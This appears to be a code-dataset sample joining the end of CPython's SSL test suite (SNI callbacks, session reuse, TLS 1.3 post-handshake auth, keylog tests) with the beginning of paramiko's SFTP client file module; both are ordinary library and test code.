client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
# Ignore expected SSLError in ConnectionHandler of ThreadedEchoServer
# (it is only raised sometimes on Windows)
with support.catch_threading_exception() as cm:
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=support.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(support.unlink, support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(support.TESTFN))
ctx.keylog_filename = support.TESTFN
self.assertEqual(ctx.keylog_filename, support.TESTFN)
self.assertTrue(os.path.isfile(support.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(support.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(support.unlink, support.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = support.TESTFN
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(support.unlink, support.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = support.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
sftp_file.py | # Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
L{SFTPFile}
"""
from binascii import hexlify
from collections import deque
import socket
import threading
import time
from paramiko.common import *
from paramiko.sftp import *
from paramiko.file import BufferedFile
from paramiko.sftp_attr import SFTPAttributes
class SFTPFile (BufferedFile):
"""
Proxy object for a file on the remote server, in client mode SFTP.
Instances of this class may be used as context managers in the same way
that built-in Python file objects are.
"""
# Some sftp servers will choke if you send read/write requests larger than
# this size.
MAX_REQUEST_SIZE = 32768
def __init__(self, sftp, handle, mode='r', bufsize=-1):
BufferedFile.__init__(self)
self.sftp = sftp
self.handle = handle
BufferedFile._set_mode(self, mode, bufsize)
self.pipelined = False
self._prefetching = False
self._prefetch_done = False
self._prefetch_data = {}
self._prefetch_reads = []
self._saved_exception = None
self._reqs = deque()
def __del__(self):
self._close(async=True)
def close(self):
self._close(async=False)
def _close(self, async=False):
# We allow double-close without signaling an error, because real
# Python file objects do. However, we must protect against actually
# sending multiple CMD_CLOSE packets, because after we close our
# handle, the same handle may be re-allocated by the server, and we
# may end up mysteriously closing some random other file. (This is
# especially important because we unconditionally call close() from
# __del__.)
if self._closed:
return
self.sftp._log(DEBUG, 'close(%s)' % hexlify(self.handle))
if self.pipelined:
self.sftp._finish_responses(self)
BufferedFile.close(self)
try:
if async:
# GC'd file handle could be called from an arbitrary thread -- don't wait for a response
self.sftp._async_request(type(None), CMD_CLOSE, self.handle)
else:
self.sftp._request(CMD_CLOSE, self.handle)
except EOFError:
# may have outlived the Transport connection
pass
except (IOError, socket.error):
# may have outlived the Transport connection
pass
def _data_in_prefetch_requests(self, offset, size):
k = [i for i in self._prefetch_reads if i[0] <= offset]
if len(k) == 0:
return False
k.sort(lambda x, y: cmp(x[0], y[0]))
buf_offset, buf_size = k[-1]
if buf_offset + buf_size <= offset:
# prefetch request ends before this one begins
return False
if buf_offset + buf_size >= offset + size:
# inclusive
return True
# well, we have part of the request. see if another chunk has the rest.
return self._data_in_prefetch_requests(buf_offset + buf_size, offset + size - buf_offset - buf_size)
def _data_in_prefetch_buffers(self, offset):
"""
if a block of data is present in the prefetch buffers, at the given
offset, return the offset of the relevant prefetch buffer. otherwise,
return None. this guarantees nothing about the number of bytes
collected in the prefetch buffer so far.
"""
k = [i for i in self._prefetch_data.keys() if i <= offset]
if len(k) == 0:
return None
index = max(k)
buf_offset = offset - index
if buf_offset >= len(self._prefetch_data[index]):
# it's not here
return None
return index
def _read_prefetch(self, size):
"""
read data out of the prefetch buffer, if possible. if the data isn't
in the buffer, return None. otherwise, behaves like a normal read.
"""
# while not closed, and haven't fetched past the current position, and haven't reached EOF...
while True:
offset = self._data_in_prefetch_buffers(self._realpos)
if offset is not None:
break
if self._prefetch_done or self._closed:
break
self.sftp._read_response()
self._check_exception()
if offset is None:
self._prefetching = False
return None
prefetch = self._prefetch_data[offset]
del self._prefetch_data[offset]
buf_offset = self._realpos - offset
if buf_offset > 0:
self._prefetch_data[offset] = prefetch[:buf_offset]
prefetch = prefetch[buf_offset:]
if size < len(prefetch):
self._prefetch_data[self._realpos + size] = prefetch[size:]
prefetch = prefetch[:size]
return prefetch
def _read(self, size):
size = min(size, self.MAX_REQUEST_SIZE)
if self._prefetching:
data = self._read_prefetch(size)
if data is not None:
return data
t, msg = self.sftp._request(CMD_READ, self.handle, long(self._realpos), int(size))
if t != CMD_DATA:
raise SFTPError('Expected data')
return msg.get_string()
def _write(self, data):
# may write less than requested if it would exceed max packet size
chunk = min(len(data), self.MAX_REQUEST_SIZE)
self._reqs.append(self.sftp._async_request(type(None), CMD_WRITE, self.handle, long(self._realpos), str(data[:chunk])))
if not self.pipelined or (len(self._reqs) > 100 and self.sftp.sock.recv_ready()):
while len(self._reqs):
req = self._reqs.popleft()
t, msg = self.sftp._read_response(req)
if t != CMD_STATUS:
raise SFTPError('Expected status')
# convert_status already called
return chunk
def settimeout(self, timeout):
"""
Set a timeout on read/write operations on the underlying socket or
ssh L{Channel}.
@see: L{Channel.settimeout}
@param timeout: seconds to wait for a pending read/write operation
before raising C{socket.timeout}, or C{None} for no timeout
@type timeout: float
"""
self.sftp.sock.settimeout(timeout)
def gettimeout(self):
"""
Returns the timeout in seconds (as a float) associated with the socket
or ssh L{Channel} used for this file.
@see: L{Channel.gettimeout}
@rtype: float
"""
return self.sftp.sock.gettimeout()
def setblocking(self, blocking):
"""
Set blocking or non-blocking mode on the underiying socket or ssh
L{Channel}.
@see: L{Channel.setblocking}
@param blocking: 0 to set non-blocking mode; non-0 to set blocking
mode.
@type blocking: int
"""
self.sftp.sock.setblocking(blocking)
def seek(self, offset, whence=0):
self.flush()
if whence == self.SEEK_SET:
self._realpos = self._pos = offset
elif whence == self.SEEK_CUR:
self._pos += offset
self._realpos = self._pos
else:
self._realpos = self._pos = self._get_size() + offset
self._rbuffer = ''
def stat(self):
"""
Retrieve information about this file from the remote system. This is
exactly like L{SFTP.stat}, except that it operates on an already-open
file.
@return: an object containing attributes about this file.
@rtype: SFTPAttributes
"""
t, msg = self.sftp._request(CMD_FSTAT, self.handle)
if t != CMD_ATTRS:
raise SFTPError('Expected attributes')
return SFTPAttributes._from_msg(msg)
def chmod(self, mode):
"""
Change the mode (permissions) of this file. The permissions are
unix-style and identical to those used by python's C{os.chmod}
function.
@param mode: new permissions
@type mode: int
"""
self.sftp._log(DEBUG, 'chmod(%s, %r)' % (hexlify(self.handle), mode))
attr = SFTPAttributes()
attr.st_mode = mode
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def chown(self, uid, gid):
"""
Change the owner (C{uid}) and group (C{gid}) of this file. As with
python's C{os.chown} function, you must pass both arguments, so if you
only want to change one, use L{stat} first to retrieve the current
owner and group.
@param uid: new owner's uid
@type uid: int
@param gid: new group id
@type gid: int
"""
self.sftp._log(DEBUG, 'chown(%s, %r, %r)' % (hexlify(self.handle), uid, gid))
attr = SFTPAttributes()
attr.st_uid, attr.st_gid = uid, gid
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def utime(self, times):
"""
Set the access and modified times of this file. If
C{times} is C{None}, then the file's access and modified times are set
to the current time. Otherwise, C{times} must be a 2-tuple of numbers,
of the form C{(atime, mtime)}, which is used to set the access and
modified times, respectively. This bizarre API is mimicked from python
for the sake of consistency -- I apologize.
@param times: C{None} or a tuple of (access time, modified time) in
standard internet epoch time (seconds since 01 January 1970 GMT)
@type times: tuple(int)
"""
if times is None:
times = (time.time(), time.time())
self.sftp._log(DEBUG, 'utime(%s, %r)' % (hexlify(self.handle), times))
attr = SFTPAttributes()
attr.st_atime, attr.st_mtime = times
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def truncate(self, size):
"""
Change the size of this file. This usually extends
or shrinks the size of the file, just like the C{truncate()} method on
python file objects.
@param size: the new size of the file
@type size: int or long
"""
self.sftp._log(DEBUG, 'truncate(%s, %r)' % (hexlify(self.handle), size))
attr = SFTPAttributes()
attr.st_size = size
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def check(self, hash_algorithm, offset=0, length=0, block_size=0):
"""
Ask the server for a hash of a section of this file. This can be used
to verify a successful upload or download, or for various rsync-like
operations.
The file is hashed from C{offset}, for C{length} bytes. If C{length}
is 0, the remainder of the file is hashed. Thus, if both C{offset}
and C{length} are zero, the entire file is hashed.
Normally, C{block_size} will be 0 (the default), and this method will
return a byte string representing the requested hash (for example, a
string of length 16 for MD5, or 20 for SHA-1). If a non-zero
C{block_size} is given, each chunk of the file (from C{offset} to
C{offset + length}) of C{block_size} bytes is computed as a separate
hash. The hash results are all concatenated and returned as a single
string.
For example, C{check('sha1', 0, 1024, 512)} will return a string of
length 40. The first 20 bytes will be the SHA-1 of the first 512 bytes
of the file, and the last 20 bytes will be the SHA-1 of the next 512
bytes.
@param hash_algorithm: the name of the hash algorithm to use (normally
C{"sha1"} or C{"md5"})
@type hash_algorithm: str
@param offset: offset into the file to begin hashing (0 means to start
from the beginning)
@type offset: int or long
@param length: number of bytes to hash (0 means continue to the end of
the file)
@type length: int or long
@param block_size: number of bytes to hash per result (must not be less
than 256; 0 means to compute only one hash of the entire segment)
@type block_size: int
@return: string of bytes representing the hash of each block,
concatenated together
@rtype: str
@note: Many (most?) servers don't support this extension yet.
@raise IOError: if the server doesn't support the "check-file"
extension, or possibly doesn't support the hash algorithm
requested
@since: 1.4
"""
t, msg = self.sftp._request(CMD_EXTENDED, 'check-file', self.handle,
hash_algorithm, long(offset), long(length), block_size)
ext = msg.get_string()
alg = msg.get_string()
data = msg.get_remainder()
return data
def set_pipelined(self, pipelined=True):
"""
Turn on/off the pipelining of write operations to this file. When
pipelining is on, paramiko won't wait for the server response after
each write operation. Instead, they're collected as they come in.
At the first non-write operation (including L{close}), all remaining
server responses are collected. This means that if there was an error
with one of your later writes, an exception might be thrown from
within L{close} instead of L{write}.
By default, files are I{not} pipelined.
@param pipelined: C{True} if pipelining should be turned on for this
file; C{False} otherwise
@type pipelined: bool
@since: 1.5
"""
self.pipelined = pipelined
def prefetch(self):
"""
Pre-fetch the remaining contents of this file in anticipation of
future L{read} calls. If reading the entire file, pre-fetching can
dramatically improve the download speed by avoiding roundtrip latency.
The file's contents are incrementally buffered in a background thread.
The prefetched data is stored in a buffer until read via the L{read}
method. Once data has been read, it's removed from the buffer. The
data may be read in a random order (using L{seek}); chunks of the
buffer that haven't been read will continue to be buffered.
@since: 1.5.1
"""
size = self.stat().st_size
# queue up async reads for the rest of the file
chunks = []
n = self._realpos
while n < size:
chunk = min(self.MAX_REQUEST_SIZE, size - n)
chunks.append((n, chunk))
n += chunk
if len(chunks) > 0:
self._start_prefetch(chunks)
def readv(self, chunks):
"""
Read a set of blocks from the file by (offset, length). This is more
efficient than doing a series of L{seek} and L{read} calls, since the
prefetch machinery is used to retrieve all the requested blocks at
once.
@param chunks: a list of (offset, length) tuples indicating which
sections of the file to read
@type chunks: list(tuple(long, int))
